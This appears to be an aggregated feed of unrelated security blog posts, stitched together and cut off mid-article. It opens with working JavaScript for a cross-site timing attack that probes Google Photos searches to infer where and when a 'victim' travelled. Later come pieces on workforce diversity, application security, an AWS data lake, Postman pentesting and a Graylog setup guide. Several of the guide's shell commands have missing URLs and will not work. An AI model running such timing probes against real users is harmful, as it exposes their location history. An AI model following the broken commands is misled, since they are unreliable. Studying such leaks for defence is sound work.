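// element. A load slower than the empty-result baseline suggests the
// query returned results.
function timeSearch(query) {
  return new Promise((resolve) => {
    const link = document.createElement("link");
    link.rel = "stylesheet"; // any subresource type that fires onload works
    const start = performance.now();
    link.onload = link.onerror = () => {
      link.remove();
      resolve(performance.now() - start);
    };
    // Hypothetical search URL for illustration; the real endpoint differs.
    link.href = "https://photos.google.com/search/" + encodeURIComponent(query);
    document.head.appendChild(link);
  });
}

// Pure decision helper: given the baseline (zero-result) timing and a map
// of query label -> measured timing, return the labels judged non-empty.
function inferVisited(baseline, timings, factor = 1.5) {
  return Object.keys(timings).filter((k) => timings[k] > baseline * factor);
}

// Probe a list of countries and report the ones the victim likely visited.
async function probeCountries(countries) {
  // Baseline: a query assumed to return zero results.
  const baseline = await timeSearch("photos of me from nowhere-xyzzy");
  const timings = {};
  for (const country of countries) {
    timings[country] = await timeSearch("photos of me from " + country);
  }
  return inferVisited(baseline, timings);
}
```

Repeating `probeCountries` with date-qualified queries (as described above) would narrow down when a given place was visited.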

Closing Thoughts

As I said in my previous blog post, it is my opinion that browser-based side-channel attacks are still overlooked. While big players like Google and Facebook are catching up, most of the industry is still unaware.

I recently joined an effort to document those attacks and vulnerable DOM APIs. You can find more information on the xsleaks repository (currently still under construction).

As a researcher, it was a privilege to contribute to protecting the privacy of the Google Photos user community, as we continuously do for our own Imperva customers.


Imperva is hosting a live webinar with Forrester Research on Wednesday, March 27 at 1 p.m. PT on the topic “Five Best Practices for Application Defense in Depth.” Join Terry Ray, Imperva SVP and Imperva Fellow; Kunal Anand, Imperva CTO; and Forrester principal analyst Amy DeMartine as they discuss how the right multi-layered defense strategy, bolstered by real-time visibility that helps security analysts distinguish real threats from noise, can provide true protection for enterprises. Sign up to watch and ask questions live, or see the recording!

The post Now-Patched Google Photos Vulnerability Let Hackers Track Your Friends and Location History appeared first on Blog.

Creating Meaningful Diversity of Thought in the Cybersecurity Workforce

The other day, I learned something that great French winemakers have known for centuries: It is often difficult to make a complex wine from just one variety of grape. It is easier to blend the juice from several grapes to achieve the structure and nuance necessary to truly delight the palate.

We are similarly relearning that building diversity into the cybersecurity workforce allows us to more easily tackle a wider range of problems and get to better, faster solutions.

Essential New Facets of Diversity

I don’t want to strain the metaphor too much, but we can certainly learn from our winemaking friends. Just as they search for juice with attributes such as structure, fruitiness and acidity, we search for ways to add the personal attributes that will be accretive to the problem-solving prowess and design genius of our teams. One of my personal quests has been to add the right mix of business skills to the technical teams I have had the honor to lead.

On my personal best practice adoption tour, I have made many familiar stops. I learned and then taught Philip Crosby’s Total Quality Management system and fretted about our company’s whole-product marketing mastery in the ’90s (thank you, Geoffrey Moore, author of “Crossing the Chasm”). Over the last 15 years, I implemented ITIL, lean principles and agile development (see the “Manifesto for Agile Software Development”), applied core and context thinking (“Dealing with Darwin”) to help my teams establish skill set development plans, and used horizon planning (introduced in “The Alchemy of Growth” by Baghai, Coley and White) to assign budget.

Throughout this journey, I kept trying to add the best practices that were intended for development, manufacturing and marketing to the mix. I was just not content to “stay in my lane.” I did this because I believe that speaking the language of development, manufacturing and marketing — aka the language of business — is essential for technology and security.

Innovation and the Language of Business

As a security evangelist, I have long advocated that chief information security officers (CISOs) must learn how to be relevant to the business and fluent in the language of business. A side benefit I did not fully explore at the time was how much the diversity of thought helped me in problem-solving.

We have been discovering the value of diversity of thought through programs such as IBM’s new collar initiative and the San Diego Cyber Center of Excellence (CCOE)’s Internship and Apprenticeship Programs. IBM’s initiative and the CCOE’s program rethink recruiting to pull workers into cybersecurity from adjacent disciplines, not just adjacent fields.

Toward the end of my stay at Intuit, I participated in a pilot program that brought innovation catalyst training to leaders outside of product development. Innovation catalysts teach the use of design thinking to deliver what the customer truly wants in a product. While learning the techniques I would later use to coach my teams and tease out well-designed services, services that would delight our internal customers, I was struck by an observation: people of different job disciplines didn’t just solve problems in different ways; they brought different values and valued different outcomes.

So, another form of diversity we should not leave out is the diversity of values derived from different work histories and job functions. We know that elegant, delightful systems that are socially and culturally relevant, and that respect our time, our training and the job we are trying to do, will have a higher adoption rate. We struggle with how to develop these systems with built-in security because we know that bolted-on security has too many seams to ever be secure.

To achieve built-in security, we’ve tried to embed security people in development and DevOps processes, but we quickly run out of security people. We try to supplement with security-minded employees, advocates and evangelists, but no matter how many people we throw at the problem, we are all like Sisyphus, trying to push an ever-bigger rock up an ever-bigger hill.

The Value of Inherently Secure Products

The problem, I think, is that we have not learned how to effectively incorporate the personal value and social value of inherently secure products. We think “make it secure too” instead of “make it secure first.” When I think about the design teams I’ve worked with as I was taking the catalyst training, the very first focus was on deep customer empathy — ultimate empathy for the job the customer is trying to do with our product or service.

People want the products they use to be secure; they expect it, they demand it. But we make it so difficult for them to act securely that they become helpless. Helpless people do not feel empowered to act safely; they become resigned to being hacked, impersonated or robbed.

The kind of thinking I am advocating for — deep empathy for the users of the products and services we sell and deploy — has led to what I believe, and studies such as IBM’s “Future of Identity Study” bear out, is the imminent elimination of the password. No matter how hard we try, we are not going to get significantly better password management. Managing 100-plus passwords will never be easy. Not having a password is easy, at least for the customer.

We have to create a new ecosystem for authentication, including approaches such as the intelligent authentication that IAmI provides. Creating this new ecosystem gives us an opportunity to delight the customer. Writing rules about what kinds of passwords one can use and creating policies to enforce the rules only delights auditors and regulators. I won’t say we lack the empathy gene, but our empathy is clearly misplaced.

Variety Is the Spice of the Cybersecurity Workforce

As we strive to create products and services that are inherently secure — aka secure by design — let’s add the diversity of approach, diversity of values and advocacy for deep customer empathy to the cybersecurity workforce diversity we are building. Coming back to my recent learning experience, I much prefer wines that were crafted by selecting grape attributes that delight the palate over ones that were easy to farm.

The post Creating Meaningful Diversity of Thought in the Cybersecurity Workforce appeared first on Security Intelligence.

How the Google and Facebook outages could impact application security

With major outages impacting Gmail, YouTube, Facebook and Instagram recently, consumers are right to be concerned over the security of their private data. While details of these outages haven’t yet been published – a situation I sincerely hope Alphabet and Facebook correct – the implications of these outages are something we should be looking closely at. The first, and most obvious, implication is the impact of data management during outages. Software developers tend to design … More

The post How the Google and Facebook outages could impact application security appeared first on Help Net Security.

Radware Blog: Bots 101: This is Why We Can’t Have Nice Things

In our industry, the term bot applies to software applications designed to perform an automated task at a high rate of speed. Typically, I use bots at Radware to aggregate data for intelligence feeds or to automate a repetitive task. I also spend a vast majority of time researching and tracking emerging bots that were […]

The post Bots 101: This is Why We Can’t Have Nice Things appeared first on Radware Blog.

Radware Blog

Don’t Be Trapped – Close Cybersecurity Holes

Take a glance at the most discussed cybersecurity news of the week. Learn about the current cybersecurity holes in business applications and how to avoid them. The air is filled with

The post Don’t Be Trapped – Close Cybersecurity Holes appeared first on The Cyber Security Place.

Application Security Has Nothing to Do With Luck

This St. Patrick’s Day is sure to bring all the usual trappings: shamrocks, the color green, leprechauns and pots of gold. But while we take a step back to celebrate Irish culture and the first signs of spring this year, the development cycle never stops. Think of a safe, secure product and a confident, satisfied customer base as the pot of gold at the end of your release rainbow. To get there, you’ll need to add application security to your delivery pipeline, but it’s got nothing to do with luck. Your success depends on your organizational culture.

It’s Time to Greenlight Application Security

Because security issues in applications have left so many feeling a little green, consumers now expect and demand security as a top priority. However, security efforts are often seen as red, as in a red stoplight or stop sign; in other cases, they are seen as a cautious yellow at best. But what if security actually enabled you to go faster?

By adding application security early in the development cycle, developers can obtain critical feedback to resolve vulnerabilities in context when they first occur. This earlier resolution can actually reduce overall cycle times. In fact, a 2016 Puppet Labs survey found that “high performers spend 50 percent less time remediating security issues than low performers,” which the most recent edition attributed to the developers building “security into the software delivery cycle as opposed to retrofitting security at the end.” The 2018 study also noted that high-performing organizations were 24 times more likely to automate security configurations.

Go green this spring by making application security testing a part of your overall quality and risk management program, and soon you’ll be delivering faster, more stable and more secure applications to happier customers.

Build Your AppSec Shamrock

Many people I talk to today are working hard to find the perfect, balanced four-leaf clover of application modernization, digital transformation, cloud computing and big data to strike gold in the marketplace. New methodologies such as microservice architectures and new container-based delivery models create an ever-changing threat landscape, and it’s no wonder that security teams feel overwhelmed.

A recent Ponemon Institute study found that 88 percent of cybersecurity teams spend at least 25 hours per week investigating and detecting application vulnerabilities, and 83 percent spend at least that much time on remediation efforts. While it’s certainly necessary to have these teams in place to continuously investigate and remediate incidents, they should ideally focus on vulnerabilities that cannot be found by other means.

A strong presence in the software delivery life cycle will allow other teams to handle more of the common and easier-to-fix issues. For a start this St. Patrick’s Day, consider establishing an application security “shamrock” that includes:

  • Static application security testing (SAST) for developer source code changes;
  • Dynamic application security testing (DAST) for key integration stages and milestones; and
  • Open-source software (OSS) to identify vulnerabilities in third-party software.

You can enhance each of these elements by leveraging automation, intelligence and machine learning capabilities. Over time, you can implement additional testing capabilities, such as interactive application security testing (IAST), penetration testing and runtime application self-protection (RASP), for more advanced insight, detection and remediation.

Get Off to a Clean Start This Spring

In the Northern Hemisphere, St. Patrick’s Day comes near the start of spring, and what better time to think about new beginnings for your security program. Start by incorporating application security in your delivery pipeline early and often to more quickly identify and remediate vulnerabilities. Before long, you’ll find that your security team has much more time to deal with more critical flaws and incidents. With developers and security personnel working in tandem, the organization will be in a much better position to release high-quality applications that lead to greater consumer trust, lower risk and fewer breaches.

The post Application Security Has Nothing to Do With Luck appeared first on Security Intelligence.

How Our Threat Analytics Multi-Region Data Lake on AWS Stores More, Slashes Costs

Data is the lifeblood of digital businesses, and a key competitive advantage. The question is: how can you store your data cost-efficiently and access it quickly, all while abiding by privacy laws?

At Imperva, we wanted to store our data for long-term access. Databases would’ve cost too much in disk and memory, especially since we didn’t know how much it would grow, how long we would keep it, and which data we would actually access in the future. The only thing we did know? That new business cases for our data would emerge.

That’s why we deployed a data lake. It turned out to be the right decision, allowing us to store 1,000 times more data than before, even while slashing costs.

What is a data lake?

A data lake is a repository of files stored in a distributed system. Information is stored in its native form, with little or no processing. You simply store the data in its native formats, such as JSON, XML, CSV, or text.

Analytics queries can be run against both data lakes and databases. In a database, you create a schema, plan your queries, and add indices to improve performance. In a data lake, it’s different: you just store the data, and it’s query-ready.

Some file formats are better than others, of course. Apache Parquet allows you to store records in a compressed columnar file. The compression saves disk space and IO, while the columnar format allows the query engine to scan only the relevant columns. This reduces query time and costs.
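To see why the columnar layout helps, here is a toy Python sketch (purely illustrative, not actual Parquet internals): a query that sums one column never has to touch the others.

```python
# Toy illustration of columnar storage (not actual Parquet internals).
rows = [
    {"day": "2018-1-1", "type": "sqli", "count": 7},
    {"day": "2018-1-1", "type": "xss", "count": 3},
    {"day": "2018-1-2", "type": "sqli", "count": 5},
]

# Columnar layout: each column is stored contiguously, so runs of
# repeated values compress well and a query can read a single column.
columns = {key: [row[key] for row in rows] for key in rows[0]}

# Summing "count" scans only that column, never "day" or "type".
total = sum(columns["count"])
print(total)  # 15
```

A real columnar file adds compression and per-column metadata on top of this idea, but the scan-only-what-you-need property is the same.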

Using a distributed file system lets you store more data at a lower cost. Whether you use Hadoop HDFS, AWS S3, or Azure Storage, the benefits include:

  • Data replication and availability
  • Options to save more money – for example, AWS S3 has different storage options with different costs
  • Retention policy – decide how long you want to keep your data before it’s automatically deleted
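On AWS S3, for example, a retention policy can be expressed as a lifecycle rule. The sketch below builds one; the bucket name, prefix and day counts are illustrative assumptions, not values from our deployment, and the boto3 call that applies it is shown commented out because it needs AWS credentials.

```python
def lifecycle_rule(prefix, ia_after_days, expire_after_days):
    """Build an S3 lifecycle rule: move objects under `prefix` to a
    cheaper storage class, then delete them after the retention period."""
    return {
        "ID": f"retention-{prefix}",
        "Filter": {"Prefix": prefix},
        "Status": "Enabled",
        "Transitions": [{"Days": ia_after_days, "StorageClass": "STANDARD_IA"}],
        "Expiration": {"Days": expire_after_days},
    }

rule = lifecycle_rule("tables/events/", 30, 365)

# Applying it (requires AWS credentials; bucket name is illustrative):
# import boto3
# boto3.client("s3").put_bucket_lifecycle_configuration(
#     Bucket="my-data-lake",
#     LifecycleConfiguration={"Rules": [rule]},
# )
```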

No wonder experts such as Adrian Cockcroft, VP of cloud architecture strategy at Amazon Web Services, said this week that “cloud data lakes are the future.”

Analytic queries: data lake versus database

Let’s examine the capabilities, advantages and disadvantages of a data lake versus a database.

The data

A data lake supports structured and unstructured data and everything in-between. All data is collected and immediately ready for analysis. Data can be transformed to improve user experience and performance. For example, fields can be extracted from a data lake and data can be aggregated.

A database contains only structured and transformed data. It is impossible to add data without declaring tables, relations and indices. You have to plan ahead and transform the data according to your schema.

Figure 1: Data Lake versus Database

The Users

Most users in a typical organization are operational, using applications and data in predefined and repetitive ways. A database is usually ideal for these users. Data is structured and optimized for these predefined use-cases. Reports can be generated, and filters can be applied according to the application’s design.

Advanced users, by contrast, may go beyond an application to the data source and use custom tools to process the data. They may also bring in data from outside the organization.

The last group are the data experts, who do deep analysis on the data. They need the raw data, and their requirements change all the time.

Data lakes support all of these users, but especially advanced and expert users, due to the agility and flexibility of a data lake.

Figure 2: Typical user distribution inside an organization

Query engine(s)

In a database, the query engine is internal and is impossible to change. In a data lake, the query engine is external, letting users choose based on their needs. For example, you can choose Presto for SQL-based analytics and Spark for machine learning.

Figure 3: A data lake may have multiple external query engines. A database has a single internal query engine.

Support of new business use-case

Database changes may be complex. Data should be analyzed and formatted, while schema has to be created before data can be inserted. If you have a busy development team, users can wait months or a year to see the new data in their application.

Few businesses can wait this long. Data lakes solve this by letting users go beyond the structure to explore data. If this proves fruitful, then a formal schema can be applied. You get to results quickly, and fail fast. This agility lets organizations quickly improve their use cases, better know their data, and react fast to changes.

Figure 4: Support of new business use-case

Data lake structure

Here’s how data may flow inside a data lake.

Figure 5: Data lake structure and flow

In this example, CSV files are added to the data lake to a “current day” folder. This folder is the daily partition which allows querying a day’s data using a filter like day = ‘2018-1-1’. Partitions are the most efficient way to filter data.

The data under tables/events is an aggregated, sorted and formatted version of the CSV data. It uses the parquet format to improve query performance and for compression. It also has an additional “type” partition, because most queries work only on a single event type. Each file has millions of records inside, with metadata for efficiency. For example, you can know the count, min and max values for all of the columns without scanning the file.
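The effect of that per-file metadata can be sketched in a few lines of Python (file names and dates below are made up): the query engine compares a filter against each file’s min/max values and skips files without ever opening them.

```python
# Per-file statistics (the same idea as Parquet's min/max metadata):
files = [
    {"name": "part-0.parquet", "min_day": "2018-1-1", "max_day": "2018-1-3"},
    {"name": "part-1.parquet", "min_day": "2018-1-4", "max_day": "2018-1-6"},
]

wanted = "2018-1-5"  # filter: day = '2018-1-5'

# Only files whose [min, max] range can contain the value are scanned.
to_scan = [f["name"] for f in files
           if f["min_day"] <= wanted <= f["max_day"]]
print(to_scan)  # ['part-1.parquet']
```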

This events table data has been added to the data lake after the raw data has been validated and analyzed.

Here is a simplified example of CSV to Parquet conversion:

Figure 6: Example for conversion of CSV to Parquet

Parquet files normally hold a large number of records, and can be divided internally into “row groups” which have their own metadata. Repeated values improve compression, and the columnar structure allows scanning only the relevant columns. The CSV data can be queried at any time, but it is not as efficient as querying the data under tables/events.
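In code, a conversion like the one in Figure 6 might look like the sketch below. The file names are illustrative, and the conversion function assumes the pyarrow package is installed, so it is defined but not executed here.

```python
import csv
import io

def csv_to_parquet(csv_path, parquet_path):
    """Convert a CSV file to a compressed Parquet file (needs pyarrow)."""
    import pyarrow.csv as pv
    import pyarrow.parquet as pq
    table = pv.read_csv(csv_path)  # infer the schema from the CSV
    pq.write_table(table, parquet_path, compression="snappy")

# The kind of raw CSV the data lake receives (values are made up):
raw = "day,type,count\n2018-1-1,sqli,7\n2018-1-1,xss,3\n"
header = next(csv.reader(io.StringIO(raw)))
print(header)  # ['day', 'type', 'count']

# csv_to_parquet("events.csv", "tables/events/events.parquet")
```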

Flow and Architecture


Imperva’s data lake uses Amazon Web Services (AWS). The diagram below shows the flow and the services we used to build it.

Figure 7: Architecture and flow

Adding data (ETL – Extract -> Transform -> Load)

  • We use Kafka, a distributed producer-consumer streaming platform. Data is added to Kafka, and later read by a microservice which creates raw Parquet files in S3.
  • Another microservice uses AWS Athena to process the data hourly or daily: it filters, partitions, sorts and aggregates it into new Parquet files
  • This flow runs in each of the AWS regions we support

Figure 8: SQL to Parquet flow example

Technical details:

  • Each partition is created by one or more Athena queries
  • Each query results in one or more Parquet files
  • ETL microservices run on a Kubernetes cluster per region. They are developed and deployed using our development pipeline.


  • Different microservices consume the aggregated data using the Athena API through the boto3 Python library
  • Day-to-day queries are done using a SQL client like DBeaver with the Athena JDBC driver. The Athena AWS management console is also used for SQL queries
  • The Apache Spark engine is used to run Spark queries, including machine learning using spark-ml. Apache Zeppelin is used as a client to run scripts and display visualizations. Both Spark and Zeppelin are installed as part of the AWS EMR service.
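As a sketch of that boto3 consumption path (the database name, table and S3 output location below are illustrative placeholders, not our real configuration), a partition filter like day = '2018-1-1' keeps Athena from scanning, and billing for, the whole table:

```python
def run_athena_query(sql, database, output_s3):
    """Submit a query through the Athena API and return its execution id."""
    import boto3  # AWS SDK for Python; needs AWS credentials to actually run
    athena = boto3.client("athena")
    response = athena.start_query_execution(
        QueryString=sql,
        QueryExecutionContext={"Database": database},
        ResultConfiguration={"OutputLocation": output_s3},
    )
    return response["QueryExecutionId"]

# The day partition filter limits the scan to a single folder:
sql = ("SELECT type, count(*) AS events "
       "FROM events "
       "WHERE day = '2018-1-1' "
       "GROUP BY type")

# run_athena_query(sql, "threat_analytics", "s3://my-athena-results/")
```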

Multi-region queries

Data privacy regulations such as GDPR add a twist, especially since we store data in multiple regions. There are two ways to perform multi-region queries:

  • Single query engine based in one of the regions
  • Query engine per region – get results per region and perform an aggregation

With a single query engine you can run SQL on data from multiple regions, BUT data is transferred between regions, which means you pay both in performance and cost.

With a query engine per region you have to aggregate the results, which may not be a simple task.

With AWS Athena, both options are available, since you don’t need to manage your own query engine.
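With the second option, the aggregation itself stays simple if each region returns partial results in the same shape. A toy Python sketch (event types and rows are invented for illustration):

```python
from collections import Counter

def query_region(region_rows):
    """Stand-in for a per-region query: COUNT(*) grouped by event type."""
    counts = Counter()
    for row in region_rows:
        counts[row["event_type"]] += 1
    return counts

# Partial results per region, merged locally instead of moving raw data:
us_east = [{"event_type": "sqli"}, {"event_type": "xss"}]
eu_west = [{"event_type": "sqli"}]
total = query_region(us_east) + query_region(eu_west)
print(total["sqli"])  # 2
```

Merging counts is easy; aggregations like distinct counts or medians are the cases where per-region merging stops being a simple task.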

Threat Analytics Data Lake – before and after

Before the data lake, we had several database solutions – relational and big data. The relational database couldn’t scale, forcing us to delete data or drop old tables. Eventually, we did analytics on a much smaller part of the data than we wanted.

With the big data solutions, the cost was high. We needed dedicated servers, and disks for storage and queries. That’s overkill: we don’t need server access 24/7, as daily batch queries work fine. We also did not have strong SQL capabilities, and found ourselves deleting data because we did not want to pay for more servers.

With our data lake, we get better analytics by:

  • Storing more data (billions of records processed daily!), which is used by our queries
  • Using SQL capabilities on a large amount of data using Athena
  • Using multiple query engines with different capabilities, like Spark for machine learning
  • Allowing queries across multiple regions with an average, acceptable response time of just 3 seconds

In addition we also got the following improvements:

  • Huge cost reductions in storage and compute
  • Reduced server maintenance

In conclusion – a data lake worked for us. AWS services made it easier for us to get the results we wanted at an incredibly low cost. It could work for you, depending on factors such as the amount of data, its format, use cases, platform and more. We suggest learning your requirements and doing a proof-of-concept with real data to find out!

The post How Our Threat Analytics Multi-Region Data Lake on AWS Stores More, Slashes Costs appeared first on Blog.

Better API Penetration Testing with Postman – Part 1

This is the first of a multi-part series on testing with Postman. I originally planned for it to be one post, but it ended up being so much content that it would likely be overwhelming if not divided into multiple parts. So here’s the plan: In this post, I’ll give you an introduction to setting up Postman and using it to issue your regular request. In Part 2, I’ll have you proxying Postman through Burp Suite. In Part 3, we’ll deal with more advanced usage of Postman, including handling Bearer tokens and Environment variables more gracefully. In Part 4, I’ll pull in one or two Burp plugins that can really augment Postman’s behavior for pen-testing.

In this day and age, web and mobile applications are often backed by RESTful web services. Public and private APIs are rampant across the internet and testing them is no trivial task. There are tools that can help. While (as always with pen-testing) tools are no substitute for skill, even the most skilled carpenter will be able to drive nails more efficiently with a hammer than with a shoe.

One such tool is Postman, which has been popular with developers for years. Before we get into how to set it up, here’s a quick overview of what Postman is and does. Postman is a commercial desktop application, available for Windows, Mac OS, and Linux. It is available for free, with paid tiers providing collaboration and documentation features. These features are more relevant to developers than penetration testers. It manages collections of HTTP requests for testing various API calls, along with environments containing variables. This does not replace your proxy (Burp, ZAP, Mitmproxy, etc), but actually stands in as the missing browser and client application layer. Main alternatives are open-source tools Insomnia and Advanced REST Client, commercial option SoapUI, or custom tooling built around Swagger/Swagger UI or curl.

Setting Up Postman

Postman is available from its official website as an installer for Windows and macOS, and as a tarball for Linux. It can also be found as a Snap for Ubuntu, and in other community-maintained repos such as the AUR for Arch Linux. The first step to setting it up is, of course, to install it.

Upon first launching Postman, you’ll be greeted with a screen prompting you to Create an Account, Sign up with Google, or sign in with existing credentials. However, Postman doesn’t require an account to use the tool. 

The account is used for the collaboration/syncing features of the paid tiers. As I mentioned earlier, they’re great for developers but you probably don’t care for them. In fact, if you generally keep your clients confidential, like we do at Secure Ideas, you probably explicitly don’t want to sync your project to a third-party server.

If you look down near the bottom of the window, there’s some light gray text that reads Skip signing in and take me straight to the app. Click that, and you will move to the next screen – a dialog prompting you to create stuff.

There are several parts you’re not going to use here, so let’s look at the three items that you actually care about:

  • Collection – a generic container you can fill with requests. It can also act as a top-level object for some configuration choices, like Authentication rules, which we’ll expand on later.
  • Request – the main purpose for being here. These are the HTTP requests you will be building out, with whatever methods, bodies, etc. you want to use. These must always be in a Collection.
  • Environment – holds variables that you want to control in one place and use across requests or even across collections.

The Basics of Working with Postman

It’s time to create our first Postman Collection and start making requests.

The New button in the top left is what you will typically use for creating Collections and Requests. Start by creating a Collection. This is sort of like an individual application scope; you will use it to group related requests.

A collection can also act as a top-level item with Authentication instructions that will be inheritable for individual requests.

For now, just name it something, and click the Create button. I called mine Test Collection.

By default, you will have an unnamed request tab open already. Let’s take a tour of that portion of the UI.

  1. The active tab
  2. The name of this request. This is just some descriptive name you can provide for it.
  3. The HTTP Method. This drop-down control lets you change the method for this request.
  4. The URL for the request. This is the full path, just as if it was in your browser.
  5. The tabbed interface for setting various attributes of the request, including Parameters, Headers, Body, etc.
  6. The send button. This actually submits the request to the specified URL, as it is currently represented in the editor.
  7. The save button. The first time you click this, you will need to specify your collection, as the request must belong to a collection.

I have a sample target set up at http://localhost:4000, so I’m going to start by filling in this request and saving it to my collection. It’s going to be a POST, to http://localhost:4000/legacy/auth, without any parameters (what can I say? It’s a test API. It’ll let anyone authenticate). When I click the Save button, I will name the request and select the Collection for it, as below.

Then I’ll click Save to Test Collection (adjust for your collection name) to save my request. Now, clicking the Send button will issue the request. Then I will see the Response populated in the lower pane of the window, as below.

  1. The tab interface has the Body, Cookies, Headers, and Test Results. We haven’t written any tests yet, but notice the badges indicating the response returned 1 cookie and 6 headers.
  2. The actual response body is in the larger text pane.
  3. We have options for pretty-printing or Raw response body, and a drop-down list for different types (I believe this is pre-populated by the content-type response header). There’s also a soft-wrap button there in case you have particularly wide responses.
  4. Metrics about the response, including HTTP Status Code, Time to respond, and Size of response.

A Side-Note about Cookies

Now, if we reissue our request with Postman, we’ll notice an important behavior: the cookie that the previous response had set will be included automatically. This mimics what a browser normally does for you. Just as you would expect from the browser, any requests Postman issues within that cookie’s scope will automatically include that cookie.

What if you want to get rid of a cookie?
That’s easy. Just below the Send button in Postman, there’s a Link-like button that says Cookies. Click that, and it will open a dialog where you can delete or edit any cookies you need to.

And that’s it in a nutshell for Cookie-based APIs. But let’s face it: it’s more common for APIs to use Bearer tokens than it is to have them use Cookies, today. We’ll address that in the upcoming section, along with some other, more advanced concepts.
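Postman’s behavior here matches any cookie-aware HTTP client. The stdlib Python sketch below (a throwaway local server, purely illustrative) shows the same mechanics: the first response sets a cookie, and the client’s cookie jar attaches it to every later request in scope.

```python
import http.cookiejar
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

class CookieEchoHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        sent = self.headers.get("Cookie")
        self.send_response(200)
        if sent is None:
            # First visit: set a session cookie, like an auth endpoint would
            self.send_header("Set-Cookie", "session=abc123; Path=/")
            self.end_headers()
            self.wfile.write(b"cookie set")
        else:
            # Later visits: echo back whatever cookie the client attached
            self.end_headers()
            self.wfile.write(sent.encode())

    def log_message(self, *args):  # keep the demo quiet
        pass

server = HTTPServer(("127.0.0.1", 0), CookieEchoHandler)
threading.Thread(target=server.serve_forever, daemon=True).start()
base = f"http://127.0.0.1:{server.server_port}/"

jar = http.cookiejar.CookieJar()
client = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
first = client.open(base).read()   # this response sets the cookie
second = client.open(base).read()  # the cookie is attached automatically
print(second)  # b'session=abc123'
server.shutdown()
```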

What’s Next

In Part 2, we’ll proxy Postman through Burp Suite, and talk about the advantages of that approach.
In Part 3, we’ll dig into some more advanced usage of Postman.
In Part 4, we’ll use some Burp Suite extensions to augment Postman.

How to Deploy a Graylog SIEM Server in AWS and Integrate with Imperva Cloud WAF

Security Information and Event Management (SIEM) products provide real-time analysis of security alerts generated by security solutions such as Imperva Cloud Web Application Firewall (WAF). Many organizations implement a SIEM solution to bring visibility of all security events from various solutions and to have the ability to search them or create their own dashboard.

Note that a simpler alternative to SIEM is Imperva Attack Analytics, which reduces the burden of integrating a SIEM logs solution and provides a condensed view of all security events into comprehensive narratives of events rated by severity. A demo of Imperva Attack Analytics is available here.

This article will take you step-by-step through the process of deploying a Graylog server that can ingest Imperva SIEM logs and let you review your data. The steps are:

  • Step 1: Deploy a new Ubuntu server on AWS
  • Step 2: Install java, Mongodb, elasticsearch
  • Step 3: Install Graylog
  • Step 4: Configure the SFTP server on the AWS server
  • Step 5: Start pushing SIEM logs from Imperva Incapsula

The steps apply to the following scenario:

  • Deployment as a stand-alone EC2 on AWS
  • Installation from scratch, from a clean Ubuntu machine (not a graylog AMI in AWS)
  • Single server setup, where the logs are located in the same server as Graylog
  • Push of the logs from Imperva using SFTP

Most of the steps below also apply to other setups and cloud platforms besides AWS. Note that in AWS, a Graylog AMI image does exist, but only with Ubuntu 14 at the time of writing. Also, I will publish future blogs on how to parse your Imperva SIEM logs and how to create a dashboard to read the logs.

Step 1: Deploy an Ubuntu Server on AWS

As a first step, let’s deploy an Ubuntu machine in AWS with the 4GB RAM required to deploy Graylog.

  1. Sign in to the AWS console and click on EC2
  2. Click Launch Instance.
  3. Select Ubuntu server 16.04, with no other software pre-installed.

It is recommended to use Ubuntu 16.04 and above, as some packages, such as MongoDB and Java openjdk-8-jre, are already included in the repos, which simplifies the installation process. The command lines below apply to Ubuntu 16.04 (the systemctl command, for instance, is not applicable to Ubuntu 14).

4. Select the Ubuntu server with 4GB RAM.

4GB is the minimum for Graylog, but you might consider more RAM depending on the volume of the data that you plan to gather.

5. Optional: increase the disk storage.

 Since we will be collecting logs, we will need more storage than the default space. The storage volume will depend a lot on the site traffic and the type of logs you will retrieve (all traffic logs or only security events logs).

Note that you will likely require much more than 40GB. If you are deploying on AWS, you can easily increase the capacity of your EC2 server anytime.

6. Select an existing key pair so you can connect to your AWS server via SSH later.

If you do not have an existing SSH key pair in your AWS account, you can create it using the ssh-keygen tool, which is part of the standard openSSH installation or using puttygen on Windows. Here’s a guide to creating and uploading your SSH key pairs.

7. Give your EC2 server a clear name and identify its public DNS and IPv4 addresses.

8. Configure the server security group in AWS.

Let’s make sure that port 9000 in particular is open. You might need to open other ports if logs are forwarded from another log collector, such as port 514 or 5044.

It is best practice to open port 22 only to the Imperva Cloud WAF IP ranges or to your own IP. Avoid opening port 22 to the world.

You can also consider locking the UI access to your public IP only.

9. SSH to your AWS server with the ubuntu user, after loading your key in PuTTY and entering the AWS public DNS entry.

10. Update your Ubuntu system to the latest versions and updates.

sudo apt-get update

sudo apt-get upgrade

Select “y” when prompted or the default options offered.

Step 2: Install Java, MongoDB and Elasticsearch

11. Install additional packages including Java JDK.

sudo apt-get install apt-transport-https openjdk-8-jre-headless uuid-runtime pwgen

Check that Java is properly installed by running:

java -version

And check the version installed. If all is working properly, you should see the installed Java version in the response.

12. Install MongoDB. Graylog uses MongoDB to store the Graylog configuration data.

MongoDB is included in the repos of Ubuntu 16.04 and works with Graylog 2.3 and above.

sudo apt-get install mongodb-server

Start MongoDB and make sure it starts with the server:

sudo systemctl start mongod

sudo systemctl enable mongod

And we can check that it is properly running by:

sudo systemctl status mongod

13. Install and configure Elasticsearch

Graylog 2.5.x can be used with Elasticsearch 5.x. You can find more instructions in the Elasticsearch installation guide:

wget -qO - | sudo apt-key add -

echo "deb stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-5.x.list

sudo apt-get update && sudo apt-get install elasticsearch

Now modify the Elasticsearch configuration file located at /etc/elasticsearch/elasticsearch.yml and set the cluster name to graylog.

sudo nano /etc/elasticsearch/elasticsearch.yml

Additionally, you need to uncomment (remove the # as first character) the cluster name line and set it to: cluster.name: graylog

Now, you can start Elasticsearch with the following commands:

sudo systemctl daemon-reload
sudo systemctl enable elasticsearch.service
sudo systemctl restart elasticsearch.service

By running sudo systemctl status elasticsearch.service you should see Elasticsearch up and running as below:

Step 3: Install Graylog

14. We can now install the Graylog repository and Graylog itself with the following commands:

sudo dpkg -i graylog-2.5-repository_latest.deb

sudo apt-get update && sudo apt-get install graylog-server

15. Configure Graylog

First, create a password of at least 64 characters by running the following command:

pwgen -N 1 -s 96

And copy the result referenced below as password

Let’s create its sha256 checksum as required in the Graylog configuration file:

echo -n password | sha256sum
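The same two values can be produced with the Python standard library if you are scripting the setup; the literal "password" below is only a stand-in for the admin password you actually choose.

```python
import hashlib
import secrets

# Equivalent of `pwgen -N 1 -s 96`: a random 96-character secret
password_secret = secrets.token_urlsafe(96)[:96]

# Equivalent of `echo -n password | sha256sum`
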